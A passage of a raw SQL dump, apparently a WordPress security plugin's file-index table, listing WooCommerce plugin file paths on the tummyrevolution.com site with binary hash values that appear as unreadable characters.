/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-download-permission.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۵H(f<榖','ĞL{ \0=VG{D5Wb}΂\ZZ','',0,'?'),('cE*D5 d\nc','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-fee.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-fee.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@qn1Xh1','CP \Z X6ۆ)sJ','',0,'?'),('3\04{','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item-meta.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','unOސ\\z','Q\0g7\\[2{_(I% 籎?o','',0,'?'),('/dÊ z\Z|','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`AO','\rXoUXUʔ 2ԯOEU','',0,'?'),('6U  aʏ','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-items.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-items.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؤ̺\'','9WӸoD,#FҨПm','',0,'?'),('Ɛz=c2f5))','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-notes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-notes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H vFMB_','=Iʷ^ATYAVD[tZc+','',0,'?'),('vN#uM7','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-refund.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-refund.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','禧_I DZ','ʰ`Ph:J \\o7ΧcQw','',0,'?'),('Alߦ\0].','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-shipping.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-order-shipping.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/%%ΪJi痛WS','4Y:uRֽ\\P/Pq*CZ}','',0,'?'),('0.?y9O2`','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-attribute-inner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-attribute-inner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xZ6`\"LZ','\"gZfM0XDǘ 1PW','',0,'?'),('\'M','\0{\n45.S?+|t4CYTX','',0,'?'),('i ik/d','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-general.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҺA㋖G7 rB','=2KГIJI \0V>,~','',0,'?'),('{0!´H','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-inventory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-inventory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r(9','dٸ<\\Rtvto','',0,'?'),('~xdMR:','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-linked-products.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-linked-products.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%b^DT','u+*vavD*&CofZ}x;M','',0,'?'),('\\њW\n̹','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-panel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':=D6c}q6Ug\ro','ӢpTq tT\rE|[W','',0,'?'),('S-\n','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-shipping.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-shipping.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xq{?}5','1|Iz̼0[?ӣoھq','',0,'?'),('I5j_&oN\Zy_','wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-variations.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/meta-boxes/views/html-product-data-variations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>4Ii','#K^j\0&x^w?R ޭ{','',0,'?'),('Dxz̦/`#','wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugin-updates.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugin-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',', ܑcq:᪌e','ɞ3O(sOaSW)\Z7\0','',0,'?'),('sN-D^gE6','wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugins-screen-updates.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/class-wc-plugins-screen-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9l+iљO','lǼƏu\\`{ GvGG','wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-inline.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MadA۶Gx',':~\\k_0$X\"{uD␚','',0,'?'),('S&r,\r','wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-modal.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/plugin-updates/views/html-notice-untested-extensions-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' $aL*a-','\',FV@w\0{a,ܷh','',0,'?'),('1]L\\ ۡ','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-admin-report.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-admin-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vh=(Oԯ)4','VIMm|>*$p ] (','',0,'?'),('P1\re\07F)Ɩ','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-coupon-usage.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-coupon-usage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i>T\0 \0hC,','oȎ`dc*iIpH=ͱ{s6)nM','',0,'?'),('rf \\\nۏr׍','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customer-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-customer-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȉQ/vj.3S','uA','IkN)L;\\M\"x‹`urs','',0,'?'),('\"ؿ\Zle\'jy','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-date.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ncx]İ','GU:-t2V s8RakĢ','',0,'?'),('X`SmÂ=I˧!','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-product.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-sales-by-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W6\\D5:\"','\nζWW_Z|bÐe','',0,'?'),('v{\ZSzG6B','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-stock.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-stock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rԩrt_űصme','tIflrêI}ӣn','',0,'?'),('cT3LY`?{7|','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-code.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dj@\"`*','?ڿVxN}=t(P','',0,'?'),('\'r,qR†GGZ','wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-date.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/reports/class-wc-report-taxes-by-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\0f?','mKZX!+ESK\nLM5!','',0,'?'),('b焪s}Ca','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-accounts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-accounts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%]Dt>JOz1','A4Qȩ6d8Sssjd+0t~','',0,'?'),('y_uK+λE<','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-advanced.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wlCe6tBˇL','s#8C%eY#\\tre\'k','',0,'?'),('JB>ZIFC','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-checkout.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-checkout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P@48B\r2uѐ','Ly@ i\0eNu*cP~^#','',0,'?'),('9>ݴo e8xy','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-emails.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-emails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S) _쐒','}`9,ّ=<:=ҋ^h<=Y-D&d','',0,'?'),('O Z%l[','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-general.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':m9M&','\rkV; qzsM@7Z0_','',0,'?'),('^qbۛ)<3oq+65JsIW','',0,'?'),('5\Z=]','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-payment-gateways.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-payment-gateways.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/V YdyoW','\'յm*bd\0vEGd','',0,'?'),(' gUg# l=J','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-products.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-products.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kҴw~_#','Yǵ^FK.`O2~w@','',0,'?'),('qX\n^j^A','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-shipping.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-shipping.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\Z@\nl9','\"#7cQú\'[Рf','',0,'?'),('$\"0syu','wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-tax.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/class-wc-settings-tax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R7:P.\"O','>X)Sr-vC\\\rcZ','',0,'?'),('X*.!MVA','wp-content/plugins/woocommerce/includes/admin/settings/views/class-wc-settings-rest-api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/class-wc-settings-rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FE퓒o AWշ','\rf3\'#ze\0Z^C ώwم','',0,'?'),('p=h<\n@%CW','wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-classes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-classes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]Yg~1','0HqG8وiCKPEd','',0,'?'),('wGWƚ૭z','wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zone-methods.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zone-methods.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq5_(k_+','=iDEz.+`XM;=','',0,'?'),('~/\0','wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-admin-page-shipping-zones.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K^Y\'S9o','vl! 8c>5Y=L','',0,'?'),('LA9H`뛘','wp-content/plugins/woocommerce/includes/admin/settings/views/html-keys-edit.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-keys-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zd2HM\"F?j',':Y/a=_)}xe?gQۤk]\'#Ų','',0,'?'),('o CB~CwO','wp-content/plugins/woocommerce/includes/admin/settings/views/html-settings-tax.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-settings-tax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b.58[1N','B09J\\ %(|RW47','',0,'?'),('8\n,?f-*8\'','wp-content/plugins/woocommerce/includes/admin/settings/views/html-webhooks-edit.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/settings/views/html-webhooks-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':8eO','',0,'?'),('3ޠF? E<8','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons-category-nav.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons-category-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ;E,Ifu','Qcu\"z $q.','',0,'?'),('|`Ӈ,&','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' fpll[','m`!@q%0\r@S]','',0,'?'),('!^Q9vgu','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-product-export.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-product-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǒNmA','*a?zQh25','',0,'?'),(' Z/:^ $ ','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-reports.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\"#C?؛d','e\'khx,gsP=S','',0,'?'),('`My;><\'wP','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs-db.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vkGIAx\\so','QA7>KZivv?AխCعn\Z1','',0,'?'),('xLY','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-logs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@g./2k9g','J(Tߩڮ9GXe\'i@','',0,'?'),('CByIwXɾB^','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-report.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^`R}h9&','[uiuXxE݆+/jEPJ','',0,'?'),('H)-TuZr|','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-tools.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\Z%ّvE','DUuͺ\'P~ho1','',0,'?'),('YhFچT {','wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-page-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p=o zd#5','_ ITFXI[@In7a','',0,'?'),('??4x\Z.*Dd','wp-content/plugins/woocommerce/includes/admin/views/html-admin-settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J+*; 5e','X}XSG^ `GMh\07?','',0,'?'),('x?ا*ZT~h','wp-content/plugins/woocommerce/includes/admin/views/html-bulk-edit-product.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-bulk-edit-product.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fk\0k)uQ','B^Rĉ^2Js90ց2\0','',0,'?'),('#>ֳ̭{*','wp-content/plugins/woocommerce/includes/admin/views/html-email-template-preview.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-email-template-preview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̷ ߻QU3','a]ye d\\\"g@1I³Z12A,&','',0,'?'),('R%hB0','wp-content/plugins/woocommerce/includes/admin/views/html-notice-base-table-missing.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-base-table-missing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0]eK','A1Ue9?\"7rjJ607{','',0,'?'),('ogd ','wp-content/plugins/woocommerce/includes/admin/views/html-notice-custom.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%d\n6q>r',':D⓳]EjYufwU','',0,'?'),('80 ANHg+(Yx}','wp-content/plugins/woocommerce/includes/admin/views/html-notice-download-dir-sync-complete.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-download-dir-sync-complete.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u(4 G\Z','*B 7?6I }{h`HeB','',0,'?'),('*.0T(\0ȣ','wp-content/plugins/woocommerce/includes/admin/views/html-notice-install.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u;q(\Zy','C_hW\n3E7Pc','',0,'?'),('{&7\Z','wp-content/plugins/woocommerce/includes/admin/views/html-notice-legacy-shipping.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-legacy-shipping.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' #o&A3',',` 2&K`ru8_-','',0,'?'),('_.uk;:h','wp-content/plugins/woocommerce/includes/admin/views/html-notice-maxmind-license-key.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-maxmind-license-key.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\T2hDnMkJ','\nU\Z]\\\nOaӘ< ^\0','',0,'?'),('U<[\"79W','wp-content/plugins/woocommerce/includes/admin/views/html-notice-no-shipping-methods.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-no-shipping-methods.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0sಞ\"b{','L󝰌9(ݻzUa13=','',0,'?'),('@ N/bT','wp-content/plugins/woocommerce/includes/admin/views/html-notice-redirect-only-download.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-redirect-only-download.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HvVt#m#','77//)B/oź׶m2傘Xu','',0,'?'),('xv #ER','wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-lookup-table.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-lookup-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"2Uyi( \0',' )ê.hhv L /phh','',0,'?'),('ZP(ĝKC3','wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-thumbnails.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-regenerating-thumbnails.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>V@);Z','-5[sJfٲge姊\ryuWHag=','',0,'?'),(' sLtC;U','wp-content/plugins/woocommerce/includes/admin/views/html-notice-secure-connection.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-secure-connection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jCA[Ak;','ԩVBO{ֿ ~','',0,'?'),('|qBlmr0','wp-content/plugins/woocommerce/includes/admin/views/html-notice-template-check.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-template-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|)tXkAC\'xĖ','W}.fW׸2ivS9+ܥ5J','',0,'?'),('\rYGVI ?','wp-content/plugins/woocommerce/includes/admin/views/html-notice-update.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w#ipX,','Z\r?pSd\"M_ ގɪ 5','',0,'?'),('om5M^dmKg','wp-content/plugins/woocommerce/includes/admin/views/html-notice-updated.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-updated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8.\'ZXMK͋1','3 \\>u\Z2;P4kw]_','',0,'?'),('1B\rwbf\"','wp-content/plugins/woocommerce/includes/admin/views/html-notice-updating.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-updating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-# ?4$࣮','nNԷTW=xk(W*LX|>9\\\n','',0,'?'),('ߥuqS8','wp-content/plugins/woocommerce/includes/admin/views/html-notice-uploads-directory-is-unprotected.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-uploads-directory-is-unprotected.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y:DiX','./ X[o,)~#','',0,'?'),('r1u7eP>','wp-content/plugins/woocommerce/includes/admin/views/html-notice-wp-php-minimum-requirements.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/views/html-notice-wp-php-minimum-requirements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@N\0|,\0','0*U\"#~V\0F{g5+٦|','',0,'?'),('ak-h8 a','wp-content/plugins/woocommerce/includes/admin/wc-admin-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/wc-admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ODR[','_\Z7x:{r 迈58\Z','',0,'?'),('d%ÃyDR>nuk','wp-content/plugins/woocommerce/includes/admin/wc-meta-box-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/admin/wc-meta-box-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pid+^T\\9?',',IЌ%\'}I0L~xy^*','',0,'?'),('\\퇲xZ','wp-content/plugins/woocommerce/includes/blocks/class-wc-blocks-utils.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/blocks/class-wc-blocks-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9S c=C4','ƃN}h/FχH ','',0,'?'),('$=JEW_1\n+','wp-content/plugins/woocommerce/includes/class-wc-ajax.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ji1FB|yjQ','sbɅLv5;]V5hp','',0,'?'),('%h6+>3-','wp-content/plugins/woocommerce/includes/class-wc-api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gywճM`','ᗖA>v_Vv\"V]','',0,'?'),('\0IB','wp-content/plugins/woocommerce/includes/class-wc-auth.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sutTMP','W]p, B\0p۷*i?','',0,'?'),('~,euyFM','wp-content/plugins/woocommerce/includes/class-wc-autoloader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' dd sd5K<','k/-|/a>','',0,'?'),('qUd-E7;','wp-content/plugins/woocommerce/includes/class-wc-background-emailer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-background-emailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JG| *VU\"','3JIt3΢{X|\r*eY60W','',0,'?'),('<*.C\0q2','wp-content/plugins/woocommerce/includes/class-wc-background-updater.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-background-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VJ^mj֫uŠkɴ','2I20Ŀ9','',0,'?'),('x\Z','wp-content/plugins/woocommerce/includes/class-wc-cache-helper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cache-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' coӶӟ3OP٪ڑ','5Qy:I\"nhbX -BZ','',0,'?'),(' \0˧Y W','wp-content/plugins/woocommerce/includes/class-wc-cart-fees.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart-fees.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nP1r ','2A O烢ʪ\ZٛMyzmO','',0,'?'),('}jq:_Hr','wp-content/plugins/woocommerce/includes/class-wc-cart-session.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart-session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kv8`jXAsx','LU]iqLz8T7$MK','',0,'?'),('!B܎_','wp-content/plugins/woocommerce/includes/class-wc-cart-totals.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart-totals.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'lr%)Ҩ','0S4`i?_zRFt\ns ܠ2z','',0,'?'),('ęaӶ_cGj','wp-content/plugins/woocommerce/includes/class-wc-cart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-cart.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(szQRiڛh','EXֳ:&&%Tkh\0ᜢH\n','',0,'?'),('3@nKE','wp-content/plugins/woocommerce/includes/class-wc-checkout.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/includes/class-wc-checkout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~0Kʱ8','@/xrT&GO \"Z,wJM?','',0,'?'),(' 